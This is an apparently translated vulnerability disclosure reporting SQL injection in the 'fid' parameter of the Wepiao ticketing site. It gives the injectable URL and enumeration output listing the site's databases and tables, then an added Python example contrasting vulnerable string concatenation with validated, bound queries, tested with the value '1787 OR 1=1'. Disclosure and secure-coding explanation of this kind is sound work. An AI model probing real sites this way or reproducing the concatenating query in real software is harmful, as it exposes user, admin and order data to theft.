2014-12-18: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-02-01: The vendor has actively ignored the vulnerability; details disclosed to the public.
Wepiao is the official WeChat movie ticketing website, offering online ticket purchase for more than 2000 cinemas; it is currently the seat-selection ticketing platform with the widest cinema coverage in the country. Sounds pretty impressive....
While booking a ticket I happened to notice an injection point:
http://www.wepiao.com/?m=web&c=film&a=filmsrc&fid=1787
Database names:
available databases [4]:
[*] app_weiying
[*] app_weiying_test
[*] information_schema
[*] test
Some of the table names:
+---------------------------------------+
| comment                               |
| comment_like                          |
| comment_reply                         |
| film_seen                             |
| film_want                             |
| weiying_active                        |
| weiying_ad                            |
| weiying_admin                         |
| weiying_admin_panel                   |
| weiying_admin_role                    |
| weiying_admin_role_priv               |
| weiying_area                          |
| weiying_certificate                   |
| weiying_cinema                        |
| weiying_city                          |
| weiying_code                          |
| weiying_device                        |
| weiying_evallike                      |
| weiying_evaluation                    |
| weiying_fctable                       |
| weiying_film                          |
| weiying_grouponticket_order           |
| weiying_groupticket                   |
| weiying_hall                          |
| weiying_menu                          |
| weiying_notice                        |
| weiying_order                         |
| weiying_poster                        |
| weiying_praise                        |
| weiying_preuve                        |
| weiying_reply                         |
| weiying_sche                          |
| weiying_scheseat                      |
| weiying_seats                         |
| weiying_see                           |
| weiying_show                          |
| weiying_tagephoto                     |
| weiying_ticket                        |
| weiying_token                         |
| weiying_user                          |
| weiying_versions                      |
| weiying_webad                         |
+---------------------------------------+
Database: app_weiying_test
[43 tables]
+---------------------------------------+
| comment                               |
| comment_like                          |
| comment_reply                         |
| film_seen                             |
| film_want                             |
| weiying_active                        |
| weiying_ad                            |
| weiying_admin                         |
| weiying_admin_panel                   |
| weiying_admin_role                    |
| weiying_admin_role_priv               |
| weiying_area                          |
| weiying_certificate                   |
| weiying_cinema                        |
| weiying_city                          |
| weiying_code                          |
| weiying_device                        |
| weiying_evallike                      |
| weiying_evaluation                    |
| weiying_fctable                       |
| weiying_film                          |
| weiying_grouponticket_order           |
| weiying_groupticket                   |
| weiying_hall                          |
| weiying_menu                          |
| weiying_notice                        |
| weiying_order                         |
| weiying_order_stream                  |
| weiying_poster                        |
| weiying_praise                        |
| weiying_preuve                        |
| weiying_reply                         |
| weiying_sche                          |
| weiying_scheseat                      |
| weiying_seats                         |
| weiying_see                           |
| weiying_show                          |
| weiying_tagephoto                     |
| weiying_ticket                        |
| weiying_token                         |
| weiying_user                          |
| weiying_versions                      |
| weiying_webad                         |
+---------------------------------------+
Database: information_schema
[59 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_CMP_RESET                      |
| INNODB_FT_BEING_DELETED               |
| INNODB_FT_CONFIG                      |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_DELETED                     |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_METRICS                        |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_DATAFILES                  |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESPACES                |
| INNODB_SYS_TABLESTATS                 |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
As above.
Filter the fid parameter.
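The one-word fix above, worked through as an added example (this is not the report's or Wepiao's code, and the film table, its columns and the rows are constructed for illustration): the `fid` parameter is whitelist-validated as a numeric id and then bound as a query parameter, so the database never parses request input as SQL. The concatenating version is kept alongside only to show what the report's injection point looks like in code.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the ticketing database.
# Table name, columns and rows are assumptions made for this example.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE weiying_film (fid INTEGER PRIMARY KEY, name TEXT, src TEXT)")
    conn.executemany(
        "INSERT INTO weiying_film VALUES (?, ?, ?)",
        [(1787, "film-1787", "src-1787"),
         (1788, "film-1788", "src-1788"),
         (1789, "film-1789", "src-1789")],
    )
    return conn


def filmsrc_vulnerable(conn: sqlite3.Connection, fid: str) -> list:
    # The flaw the report describes: the request parameter is pasted straight
    # into the SQL text, so whatever the client sends becomes part of the query.
    sql = "SELECT fid, src FROM weiying_film WHERE fid = " + fid
    return conn.execute(sql).fetchall()


def filmsrc_hardened(conn: sqlite3.Connection, fid: str) -> list:
    # 1. Whitelist validation: a film id is a short string of digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,10}", fid):
        raise ValueError("invalid fid")
    # 2. Parameter binding: the value travels separately from the SQL text,
    #    so the database treats it as data, never as part of the statement.
    return conn.execute(
        "SELECT fid, src FROM weiying_film WHERE fid = ?", (int(fid),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("hardened, valid id:", filmsrc_hardened(db, "1787"))
    try:
        filmsrc_hardened(db, "1787 OR 1=1")
    except ValueError as exc:
        print("hardened, tampered id rejected:", exc)
    print("vulnerable, tampered id returns every row:",
          len(filmsrc_vulnerable(db, "1787 OR 1=1")))
```

Either control on its own would have closed this particular hole; applying both is the usual practice, since validation also stops malformed ids from reaching the database at all and gives a clean place to log and alert on tampered requests.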
Unable to contact the vendor, or the vendor actively declined.